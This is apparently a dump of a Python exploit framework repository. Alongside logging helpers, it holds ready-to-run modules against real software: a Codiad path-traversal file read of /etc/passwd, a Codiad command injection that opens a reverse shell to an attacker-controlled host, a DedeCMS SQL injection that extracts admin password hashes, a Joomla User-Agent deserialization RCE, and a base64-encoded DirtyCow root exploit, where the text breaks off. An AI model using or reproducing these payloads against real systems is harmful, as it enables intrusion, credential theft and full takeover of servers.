59 | ## Sponsors 60 | 61 | Support this project by becoming a sponsor. Your logo will show up here with a link to your website. 
[[Become a sponsor](https://opencollective.com/Exploit-Framework#sponsor)] 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | -------------------------------------------------------------------------------- /core/banner/banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | def banner(): 5 | print("===================================================") 6 | print("| Exploit Framework (v0.0.1) |") 7 | print("| https://github.com/wangyihang/exploit-framework |") 8 | print("===================================================") 9 | 10 | if __name__ == "__main__": 11 | banner() 12 | -------------------------------------------------------------------------------- /core/log/Log.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: utf-8 3 | 4 | from core.log import color 5 | import sys 6 | 7 | class Log(): 8 | @staticmethod 9 | def _print(word): 10 | sys.stdout.write(word) 11 | sys.stdout.flush() 12 | 13 | @staticmethod 14 | def info(word): 15 | Log._print("[+] %s\n" % color.lightPurple(word)) 16 | 17 | @staticmethod 18 | def warning(word): 19 | Log._print("[!] %s\n" % color.yellow(word)) 20 | 21 | @staticmethod 22 | def error(word): 23 | Log._print("[-] %s\n" % color.red(word)) 24 | 25 | @staticmethod 26 | def success(word): 27 | Log._print("[+] %s\n" % color.purple(word)) 28 | 29 | @staticmethod 30 | def query(word): 31 | Log._print("[?] 
%s\n" % color.underline(word)) 32 | 33 | @staticmethod 34 | def context(context): 35 | Log._print("[%s]" % (color.red(context))) 36 | -------------------------------------------------------------------------------- /core/log/color.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/envpython 2 | #encoding):utf-8 3 | 4 | def black(string): 5 | return'\033[30m'+string+'\033[0m' 6 | 7 | def blue(string): 8 | return'\033[94m'+string+'\033[0m' 9 | 10 | def gray(string): 11 | return'\033[1;30m'+string+'\033[0m' 12 | 13 | def green(string): 14 | return'\033[92m'+string+'\033[0m' 15 | 16 | def cyan(string): 17 | return'\033[96m'+string+'\033[0m' 18 | 19 | def lightPurple(string): 20 | return'\033[94m'+string+'\033[0m' 21 | 22 | def purple(string): 23 | return'\033[95m'+string+'\033[0m' 24 | 25 | def red(string): 26 | return'\033[91m'+string+'\033[0m' 27 | 28 | def underline(string): 29 | return'\033[4m'+string+'\033[0m' 30 | 31 | def white(string): 32 | return'\033[0m'+string+'\033[0m' 33 | 34 | def white_2(string): 35 | return'\033[1m'+string+'\033[0m' 36 | 37 | def yellow(string): 38 | return'\033[93m'+string+'\033[0m' 39 | -------------------------------------------------------------------------------- /exploit/codiad/cve_2014_9581.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | "admin_user": {"default": "admin", "necessity": True}, 25 | "admin_pwd": 
{"default": "admin", "necessity": True}, 26 | "file": {"default": "/etc/passwd", "necessity": True}, 27 | "interactive": {"default": True, "necessity": True} 28 | } 29 | session = requests.Session() 30 | 31 | def __init__(self): 32 | pass 33 | 34 | def login(self): 35 | url = "http://%s:%d/components/user/controller.php?action=authenticate" % (self.get_config("remote_host"), int(self.get_config("remote_port"))) 36 | data = { 37 | "username":self.get_config("admin_user"), 38 | "password":self.get_config("admin_pwd"), 39 | "theme":"default", 40 | "language":"en" 41 | } 42 | response = self.session.post(url, data=data) 43 | content = response.content 44 | print("[+] Login Content : %s" % (content)) 45 | if 'status":"success"' in content: 46 | return True 47 | else: 48 | return False 49 | 50 | def exploit(self): 51 | ''' 52 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 53 | ''' 54 | host = self.get_config("remote_host") 55 | port = self.get_config("remote_port") 56 | file = self.get_config("file") 57 | if not self.login(): 58 | Log.Log.error("Login failed!") 59 | return False 60 | Log.Log.success("Login successful!") 61 | url = "http://%s:%d/components/filemanager/download.php?path=../../../../..%s&type=undefined" % (host, port, file) 62 | try: 63 | response = self.session.get(url) 64 | if response.status_code == 200: 65 | Log.Log.success("Exploit success!") 66 | Log.Log.info(">>>>>> %s <<<<<<" % (file)) 67 | print("%s" % color.blue(response.content)) 68 | return True 69 | else: 70 | return False 71 | except Exception as e: 72 | Log.Log.error(str(e)) 73 | return False 74 | 75 | def show_options(self): 76 | ''' 77 | 输出该模块的选项信息 (即之前定义的 config) 78 | 由 options 命令触发 79 | 通常不需要改动 80 | ''' 81 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 82 | Log.Log.warning("-------\t\t---------\t\t-------") 83 | for key in sorted(self.config.keys()): 84 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 85 | key, self.config[key]["necessity"], self.get_config(key))) 86 | 87 | def set_config(self, key, value): 88 | 
''' 89 | value®改 90 | 由 set 命令触发 91 | 通常不需要改动 92 | ''' 93 | if key in self.config.keys(): 94 | self.config[key]["default"] = value 95 | else: 96 | Log.Log.error("No such option!") 97 | 98 | def get_config(self, key): 99 | return self.config[key]["default"] 100 | 101 | def show_info(self): 102 | ''' 103 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 104 | 该函数在模块被加载的时候自动调用 105 | 需要将其中的信息修改为对应的模块信息 106 | ''' 107 | Log.Log.info("Name: Codiad (2.4.3) Any file read (CVE-2014-9581)") 108 | Log.Log.info("Effected Version: <=2.4.3") 109 | Log.Log.info("Author: TaurusOmar") 110 | Log.Log.info("Email: taurusomar13@gmail.com") 111 | Log.Log.info("Twitter: @TaurusOmar_") 112 | Log.Log.info("Home: overhat.blogspot.com") 113 | Log.Log.info("Refer:") 114 | Log.Log.info("\thttps://www.exploit-db.com/exploits/35585/") 115 | 116 | def main(): 117 | ''' 118 | 测试用例 119 | ''' 120 | exploit = Exploit() 121 | exploit.show_info() 122 | exploit.set_config("remote_host", "localhost") 123 | exploit.show_options() 124 | exploit.exploit() 125 | 126 | if __name__ == "__main__": 127 | main() 128 | -------------------------------------------------------------------------------- /exploit/codiad/cve_2017_11366.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | import json 6 | 7 | try: 8 | from core.log import Log 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | 14 | class Exploit: 15 | config = { 16 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 17 | "remote_port": {"default": 80, "necessity":True}, 18 | "local_host": {"default": "8.8.8.8", "necessity":True}, 19 | "local_port": {"default": 8888, "necessity":True}, 20 | "admin_user": {"default": "admin", "necessity":True}, 21 | "admin_pwd": {"default": "admin", "necessity":True}, 22 | } 23 | 24 | session = requests.Session() 25 | 26 | def __init__(self): 27 | pass 28 | 
29 | def login(self): 30 | url = "http://%s:%d/components/user/controller.php?action=authenticate" % (self.get_config("remote_host"), int(self.get_config("remote_port"))) 31 | data = { 32 | "username":self.get_config("admin_user"), 33 | "password":self.get_config("admin_pwd"), 34 | "theme":"default", 35 | "language":"en" 36 | } 37 | response = self.session.post(url, data=data) 38 | content = response.content 39 | print("[+] Login Content : %s" % (content)) 40 | if 'status":"success"' in content: 41 | return True 42 | else: 43 | return False 44 | 45 | def get_write_able_path(self): 46 | url = "http://%s:%d/components/user/controller.php?action=get_current" % (self.get_config("remote_host"), self.get_config("remote_port")) 47 | response = self.session.get(url) 48 | content = response.content 49 | print(content) 50 | print("[+] Path Content : %s" % (content)) 51 | json_obj = json.loads(content) 52 | if json_obj['status'] == "success": 53 | return json_obj['data']['path'] 54 | else: 55 | return False 56 | 57 | def get_write_able_path(self): 58 | url = "http://%s:%d/components/project/controller.php?action=get_current" % (self.get_config("remote_host"), self.get_config("remote_port")) 59 | response = self.session.get(url) 60 | content = response.content 61 | print("[+] Path Content : %s" % (content)) 62 | json_obj = json.loads(content) 63 | if json_obj['status'] == "success": 64 | return json_obj['data']['path'] 65 | else: 66 | return False 67 | 68 | def exploit(self): 69 | remote_host = self.get_config("remote_host") 70 | remote_port = self.get_config("remote_port") 71 | 72 | Log.Log.info("Logining...") 73 | if self.login(): 74 | Log.Log.success("Login successfully!") 75 | else: 76 | Log.Log.error("Login failed!") 77 | return False 78 | 79 | Log.Log.info("Getting writable path...") 80 | path = self.get_write_able_path() 81 | if path == False: 82 | Log.Log.error("Get current path error!") 83 | return False 84 | Log.Log.info("Writable Path: %s" % (path)) 85 | 86 | 
local_host = self.get_config("local_host") 87 | local_port = int(self.get_config("local_port")) 88 | Log.Log.info("Getting reverse shell at %s:%d" % (local_host, local_port)) 89 | 90 | url = "http://%s:%d/components/filemanager/controller.php?action=search&path=%s" % (remote_host, remote_port, path) 91 | payload = '''SniperOJ%22%0A%2Fbin%2Fbash+-c+'sh+-i+%3E%26%2Fdev%2Ftcp%2F'''+local_host+'''%2F'''+str(local_port)+'''+0%3E%261'%0Agrep+%22SniperOJ''' 92 | data = "search_string=Hacker&search_file_type=" + payload 93 | headers = {"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"} 94 | try: 95 | response = self.session.post(url, data=data, headers=headers, timeout=3) 96 | content = response.content 97 | print(content) 98 | if content == '''{"status":"error","message":"No Results Returned"}''': 99 | Log.Log.error("If your see this message immediately, three reasons:") 100 | Log.Log.error("1. you just haved exit the reverse shell.") 101 | Log.Log.error("2. the target server cannot access your vps server") 102 | Log.Log.error("3. you havn't start listen a port on your vps server (%s:%d), so connection failed." 
% (self.get_config("local_host"), self.get_config("local_port"))) 103 | except Exception as e: 104 | Log.Log.success(str(e)) 105 | Log.Log.success("Please check your reverse shell at %s:%d" % (self.get_config("local_host"), self.get_config("local_port"))) 106 | 107 | def show_options(self): 108 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 109 | Log.Log.warning("-------\t\t---------\t\t-------") 110 | for key in sorted(self.config.keys()): 111 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 112 | 113 | def set_config(self, key, value): 114 | if key in self.config.keys(): 115 | self.config[key]["default"] = value 116 | else: 117 | Log.Log.error("No such option!") 118 | 119 | def get_config(self, key): 120 | return self.config[key]["default"] 121 | 122 | def show_info(self): 123 | Log.Log.info("Name: Codiad(2.8.4) Remote Command Execute (CVE-2017-11366)") 124 | Log.Log.info("Effected Version: <=2.8.4") 125 | Log.Log.info("Author: WangYihang") 126 | Log.Log.info("Email: wangyihanger@gmail.com") 127 | Log.Log.info("Refer:") 128 | Log.Log.info("\thttp://www.jianshu.com/p/41ac7ac2a7af") 129 | Log.Log.info("\thttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11366") 130 | 131 | def main(): 132 | exploit = Exploit() 133 | exploit.show_info() 134 | exploit.set_config("remote_host", "127.0.0.1") 135 | exploit.set_config("local_host", "127.0.0.1") 136 | exploit.set_config("local_port", 5555) 137 | exploit.show_options() 138 | exploit.exploit() 139 | 140 | if __name__ == "__main__": 141 | main() 142 | -------------------------------------------------------------------------------- /exploit/dedecms/dedecms_recommand_php_sql_injection.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | 
sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | 16 | class Exploit: 17 | # 定义该漏洞利用的配置信息 18 | # 备注: 19 | # necessity 表示该参数是否必须配置 20 | # default 为该参数的默认值 21 | config = { 22 | "remote_host": {"default": "127.0.0.1", "necessity": True}, 23 | "remote_port": {"default": 80, "necessity": True}, 24 | } 25 | # 如果该漏洞可以 GetShell, 该变量存储 shell 的 url 26 | webshell_url = "" 27 | session = requests.Session() 28 | 29 | def __init__(self): 30 | pass 31 | 32 | def exploit(self): 33 | ''' 34 | 漏洞利用的核心代码, 在此函数中完成漏洞利用 35 | ''' 36 | Log.Log.info("Lauching the exploition...") 37 | host = self.get_config("remote_host") 38 | port = int(self.get_config("remote_port")) 39 | url = "http://%s:%d/%s" % (host, port, '''plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\\%27%20or%20mid=@`\\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294''') 40 | Log.Log.info("Url: %s" % (url)) 41 | try: 42 | response = requests.get(url) 43 | if response.status_code == 200: 44 | content = response.content 45 | if "

" not in content: 46 | Log.Log.error("Exploit Failed!") 47 | return False 48 | data = response.content.split("

")[1].split("

")[0].split("\\|") 49 | if len(data) != 2: 50 | Log.Log.error("Exploit Failed!") 51 | return False 52 | Log.Log.success("Exploit success!") 53 | username = data[0] 54 | password = data[1] 55 | print("%s" % (color.cyan("Username\tHash"))) 56 | print("%s" % (color.blue("%s\t%s" % (username, password)))) 57 | return True 58 | else: 59 | return False 60 | except Exception as e: 61 | Log.Log.error(str(e)) 62 | return False 63 | 64 | def show_options(self): 65 | ''' 66 | 输出该模块的选项信息 (即之前定义的 config) 67 | 由 options 命令触发 68 | 通常不需要改动 69 | ''' 70 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 71 | Log.Log.warning("-------\t\t---------\t\t-------") 72 | for key in sorted(self.config.keys()): 73 | Log.Log.warning("%s\t\t%s\t\t\t%s" % ( 74 | key, self.config[key]["necessity"], self.get_config(key))) 75 | 76 | def set_config(self, key, value): 77 | ''' 78 | 对模块的参数进行修改 79 | 由 set 命令触发 80 | 通常不需要改动 81 | ''' 82 | if key in self.config.keys(): 83 | self.config[key]["default"] = value 84 | else: 85 | Log.Log.error("No such option!") 86 | 87 | def get_config(self, key): 88 | return self.config[key]["default"] 89 | 90 | def interactive(self): 91 | ''' 92 | 在成功拿到 WebShell 之后, 可以利用该函数获得一个伪终端 93 | 这里判断了 webshell_url 这个变量是否为空 94 | 因此, 在拿到 webshell 地址后, 需要将 webshell_url 进行设置 95 | ''' 96 | if self.webshell_url == "": 97 | Log.Log.error("Webshell is dead!") 98 | return 99 | while True: 100 | command = input("$ ") 101 | if command == "exit": 102 | break 103 | data = { 104 | self.get_config("shell_pwd"):"system(base64_decode('%s'));die();" % (command.encode("base64").replace("\n", "")) 105 | } 106 | print(data) 107 | try: 108 | Log.Log.success(self.session.post(self.webshell_url, data=data).content) 109 | except Exception as e: 110 | Log.Log.error(str(e)) 111 | return False 112 | 113 | def show_info(self): 114 | ''' 115 | 模块(漏洞)的详细信息, 包括名称, 影响版本, 作者, 参考链接等等 116 | 该函数在模块被加载的时候自动调用 117 | 需要将其中的信息修改为对应的模块信息 118 | ''' 119 | Log.Log.info("Name: DedeCms (V5.6) recommend.php SQL injection") 120 | 
Log.Log.info("Effected Version: <=5.6") 121 | Log.Log.info("Author: 没穿底裤") 122 | Log.Log.info("Home: http://0day5.com/author/1/") 123 | Log.Log.info("Refer:") 124 | Log.Log.info("\thttp://0day5.com/archives/1349/") 125 | 126 | def main(): 127 | ''' 128 | 测试用例 129 | ''' 130 | exploit = Exploit() 131 | exploit.show_info() 132 | exploit.set_config("remote_host", "192.168.187.1") 133 | exploit.set_config("session_id", "b6aia8tltrqtie7h0pjojelml3") 134 | exploit.set_config("shell_pwd", "hacker") 135 | exploit.show_options() 136 | exploit.exploit() 137 | 138 | if __name__ == "__main__": 139 | main() 140 | -------------------------------------------------------------------------------- /exploit/joomla/cve_2015_8562.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import requests 5 | 6 | try: 7 | from core.log import Log 8 | except Exception as e: 9 | import sys 10 | sys.path.append("../../core/log") 11 | from Log import Log 12 | 13 | class Exploit: 14 | config = { 15 | "remote_host": {"default": "127.0.0.1", "necessity":True}, 16 | "remote_port": {"default": 80, "necessity":True}, 17 | "command": {"default": "id", "necessity":True}, 18 | } 19 | webshell_url = "" 20 | 21 | def __init__(self): 22 | pass 23 | 24 | def exploit(self): 25 | remote_host = self.get_config("remote_host") 26 | remote_port = int(self.get_config("remote_port")) 27 | command = self.get_config("command") 28 | url = "http://%s:%d/" % (remote_host, remote_port) 29 | payload = self.generate_payload("system(base64_decode('%s'));" % (command.encode("base64").replace("\n", ""))) 30 | headers = { 31 | 'User-Agent': payload 32 | } 33 | session = requests.Session() 34 | try: 35 | cookies = session.get(url, headers=headers, timeout=3) 36 | response = session.get(url, timeout=10, headers=headers) 37 | except Exception as e: 38 | Log.Log.error(str(e)) 39 | return False 40 | content = response.content 41 | 
Log.Log.success(content) 42 | return True 43 | 44 | def generate_payload(self, php_payload): 45 | php_payload = php_payload 46 | terminate = '\xf0\x9d\x8c\x86' 47 | exploit_template = r'''}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";''' 48 | injected_payload = "{};JFactory::getConfig();exit".format(php_payload) 49 | exploit_template += r'''s:{0}:"{1}"'''.format(str(len(injected_payload)), injected_payload) 50 | exploit_template += r''';s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}''' + terminate 51 | return exploit_template 52 | 53 | def show_options(self): 54 | Log.Log.warning("Options\t\tNecessity\t\tDefault") 55 | Log.Log.warning("-------\t\t---------\t\t-------") 56 | for key in sorted(self.config.keys()): 57 | Log.Log.warning("%s\t\t%s\t\t\t%s" % (key, self.config[key]["necessity"], self.get_config(key))) 58 | 59 | def set_config(self, key, value): 60 | if key in self.config.keys(): 61 | self.config[key]["default"] = value 62 | else: 63 | Log.Log.error("No such option!") 64 | 65 | def get_config(self, key): 66 | return self.config[key]["default"] 67 | 68 | def show_info(self): 69 | Log.Log.info("Name: Joomla(1.5 < 3.45) HTTP Header Unauthenticated RCE (CVE-2015-8562)") 70 | Log.Log.info("Effected Version: 1.5 < 3.45") 71 | Log.Log.info("Author: Andrew McNicol") 72 | Log.Log.info("GitHub: https://github.com/anarcoder") 73 | Log.Log.info("Refer:") 74 | Log.Log.info('\thttps://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html') 75 | Log.Log.info('\thttps://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html') 76 | Log.Log.info('\thttps://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html') 77 | 
Log.Log.info('\thttps://blog.patrolserver.com/2015/12/17/in-depth-analyses-of-the-joomla-0-day-user-agent-exploit/') 78 | Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330') 79 | Log.Log.info('\thttps://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html') 80 | Log.Log.info('\thttps://bugs.php.net/bug.php?id=70219') 81 | 82 | def main(): 83 | exploit = Exploit() 84 | exploit.show_info() 85 | exploit.set_config("remote_host", "192.168.187.1") 86 | exploit.show_options() 87 | exploit.exploit() 88 | 89 | if __name__ == "__main__": 90 | main() 91 | -------------------------------------------------------------------------------- /exploit/kernel/cve_2016_5195.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding: utf-8 -*- 3 | 4 | import os 5 | 6 | try: 7 | from core.log import Log 8 | from core.log import color 9 | except Exception as e: 10 | import sys 11 | sys.path.append("../../core/log") 12 | from Log import Log 13 | from Log import color 14 | 15 | class Exploit: 16 | # 定义该漏洞利用的配置信息 17 | # 备注: 18 | # necessity 表示该参数是否必须配置 19 | # default 为该参数的默认值 20 | config = { 21 | } 22 | 23 | code = ''' 24 | I2luY2x1ZGUgPHN0ZGlvLmg+CiNpbmNsdWRlIDxzdGRsaWIuaD4KI2luY2x1ZGUgPHN5cy9tbWFu 25 | Lmg+CiNpbmNsdWRlIDxmY250bC5oPgojaW5jbHVkZSA8cHRocmVhZC5oPgojaW5jbHVkZSA8c3Ry 26 | aW5nLmg+CiNpbmNsdWRlIDx1bmlzdGQuaD4KCnZvaWQgKm1hcDsKaW50IGY7CmludCBzdG9wID0g 27 | MDsKc3RydWN0IHN0YXQgc3Q7CmNoYXIgKm5hbWU7CnB0aHJlYWRfdCBwdGgxLHB0aDIscHRoMzsK 28 | CmNoYXIgc3VpZF9iaW5hcnlbXSA9ICIvdXNyL2Jpbi9wYXNzd2QiOwoKLyoKICogKiAkIG1zZnZl 29 | bm9tIC1wIGxpbnV4L3g2NC9leGVjIENNRD0iZWNobyAwID4gL3Byb2Mvc3lzL3ZtL2RpcnR5X3dy 30 | aXRlYmFja19jZW50aXNlY3MmJmNwIC1mIC90bXAvYmFrIC91c3IvYmluL3Bhc3N3ZCYmL2Jpbi9i 31 | YXNoIiBQcmVwZW5kU2V0dWlkPVRydWUgLWYgZWxmIHwgeHhkIC1pCiAqICovCnVuc2lnbmVkIGNo 32 | 
YXIgc2NbXSA9IHsKICAweDdmLCAweDQ1LCAweDRjLCAweDQ2LCAweDAyLCAweDAxLCAweDAxLCAw 33 | eDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4 34 | MDIsIDB4MDAsIDB4M2UsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHg3OCwgMHgw 35 | MCwgMHg0MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg0MCwgMHgwMCwgMHgwMCwg 36 | MHgwMCwKICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 37 | eDAwLCAweDAwLCAweDAwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NDAsIDB4 38 | MDAsIDB4MzgsIDB4MDAsIDB4MDEsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMCwgMHgwMCwgMHgw 39 | MCwgMHgwMCwgMHgwMSwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwNywgMHgwMCwgMHgwMCwgMHgwMCwK 40 | ICAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 41 | eDAwLCAweDQwLCAweDAwLAogIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4 42 | NDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsIDB4MDAsCiAgMHgwMiwgMHgwMSwgMHgwMCwgMHgw 43 | MCwgMHgwMCwgMHgwMCwgMHgwMCwgMHgwMCwgMHg4YywgMHgwMSwgMHgwMCwgMHgwMCwKICAweDAw 44 | LCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAweDEwLCAweDAwLCAweDAwLCAweDAwLCAweDAwLCAw 45 | eDAwLCAweDAwLAogIDB4NDgsIDB4MzEsIDB4ZmYsIDB4NmEsIDB4NjksIDB4NTgsIDB4MGYsIDB4 46 | MDUsIDB4NmEsIDB4M2IsIDB4NTgsIDB4OTksCiAgMHg0OCwgMHhiYiwgMHgyZiwgMHg2MiwgMHg2 47 | OSwgMHg2ZSwgMHgyZiwgMHg3MywgMHg2OCwgMHgwMCwgMHg1MywgMHg0OCwKICAweDg5LCAweGU3 48 | LCAweDY4LCAweDJkLCAweDYzLCAweDAwLCAweDAwLCAweDQ4LCAweDg5LCAweGU2LCAweDUyLCAw 49 | eGU4LAogIDB4NWIsIDB4MDAsIDB4MDAsIDB4MDAsIDB4NjUsIDB4NjMsIDB4NjgsIDB4NmYsIDB4 50 | MjAsIDB4MzAsIDB4MjAsIDB4M2UsCiAgMHgyMCwgMHgyZiwgMHg3MCwgMHg3MiwgMHg2ZiwgMHg2 51 | MywgMHgyZiwgMHg3MywgMHg3OSwgMHg3MywgMHgyZiwgMHg3NiwKICAweDZkLCAweDJmLCAweDY0 52 | LCAweDY5LCAweDcyLCAweDc0LCAweDc5LCAweDVmLCAweDc3LCAweDcyLCAweDY5LCAweDc0LAog 53 | IDB4NjUsIDB4NjIsIDB4NjEsIDB4NjMsIDB4NmIsIDB4NWYsIDB4NjMsIDB4NjUsIDB4NmUsIDB4 54 | NzQsIDB4NjksIDB4NzMsCiAgMHg2NSwgMHg2MywgMHg3MywgMHgyNiwgMHgyNiwgMHg2MywgMHg3 55 | MCwgMHgyMCwgMHgyZCwgMHg2NiwgMHgyMCwgMHgyZiwKICAweDc0LCAweDZkLCAweDcwLCAweDJm 56 | 
LCAweDYyLCAweDYxLCAweDZiLCAweDIwLCAweDJmLCAweDc1LCAweDczLCAweDcyLAogIDB4MmYs 57 | IDB4NjIsIDB4NjksIDB4NmUsIDB4MmYsIDB4NzAsIDB4NjEsIDB4NzMsIDB4NzMsIDB4NzcsIDB4 58 | NjQsIDB4MjYsCiAgMHgyNiwgMHgyZiwgMHg2MiwgMHg2OSwgMHg2ZSwgMHgyZiwgMHg2MiwgMHg2 59 | MSwgMHg3MywgMHg2OCwgMHgwMCwgMHg1NiwKICAweDU3LCAweDQ4LCAweDg5LCAweGU2LCAweDBm 60 | LCAweDA1Cn07CnVuc2lnbmVkIGludCBzY19sZW4gPSAyNTg7CgoKdm9pZCAqbWFkdmlzZVRocmVh 61 | ZCh2b2lkICphcmcpCnsKICAgIGNoYXIgKnN0cjsKICAgIHN0cj0oY2hhciopYXJnOwogICAgaW50 62 | IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAwMDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAg 63 | IGMrPW1hZHZpc2UobWFwLDEwMCxNQURWX0RPTlRORUVEKTsKICAgICAgICB9CiAgICBwcmludGYo 64 | InRocmVhZCBzdG9wcGVkXG4iKTsKfQoKdm9pZCAqcHJvY3NlbGZtZW1UaHJlYWQodm9pZCAqYXJn 65 | KQp7CiAgICBjaGFyICpzdHI7CiAgICBzdHI9KGNoYXIqKWFyZzsKICAgIGludCBmPW9wZW4oIi9w 66 | cm9jL3NlbGYvbWVtIixPX1JEV1IpOwogICAgaW50IGksYz0wOwogICAgZm9yKGk9MDtpPDEwMDAw 67 | MDAgJiYgIXN0b3A7aSsrKSB7CiAgICAgICAgICAgIGxzZWVrKGYsbWFwLFNFRUtfU0VUKTsKICAg 68 | ICAgICAgICAgYys9d3JpdGUoZiwgc3RyLCBzY19sZW4pOwogICAgICAgIH0KICAgIHByaW50Zigi 69 | dGhyZWFkIHN0b3BwZWRcbiIpOwp9Cgp2b2lkICp3YWl0Rm9yV3JpdGUodm9pZCAqYXJnKSB7CiAg 70 | ICBjaGFyIGJ1ZltzY19sZW5dOwoKICAgIGZvcig7OykgewogICAgICAgICAgICBGSUxFICpmcCA9 71 | IGZvcGVuKHN1aWRfYmluYXJ5LCAicmIiKTsKCiAgICAgICAgICAgIGZyZWFkKGJ1Ziwgc2NfbGVu 72 | LCAxLCBmcCk7CgogICAgICAgICAgICBpZihtZW1jbXAoYnVmLCBzYywgc2NfbGVuKSA9PSAwKSB7 73 | CiAgICAgICAgICAgICAgICAgICAgICAgIHByaW50ZigiJXMgb3ZlcndyaXR0ZW5cbiIsIHN1aWRf 74 | YmluYXJ5KTsKICAgICAgICAgICAgICAgICAgICAgICAgYnJlYWs7CiAgICAgICAgICAgICAgICAg 75 | ICAgfQoKICAgICAgICAgICAgZmNsb3NlKGZwKTsKICAgICAgICAgICAgc2xlZXAoMSk7CiAgICAg 76 | ICAgfQoKICAgIHN0b3AgPSAxOwoKICAgIHByaW50ZigiUG9wcGluZyByb290IHNoZWxsLlxuIik7 77 | CiAgICBwcmludGYoIkRvbid0IHdvcnJ5LC91c3IvYmluL3Bhc3N3ZCBoYXMgYmVlbiByZXN0b3Jl 78 | ZC5cbiIpOwoKICAgIHN5c3RlbShzdWlkX2JpbmFyeSk7Cn0KCmludCBtYWluKGludCBhcmdjLGNo 79 | YXIgKmFyZ3ZbXSkgewogICAgY2hhciAqYmFja3VwOwoKICAgIHByaW50ZigiRGlydHlDb3cgcm9v 80 | 
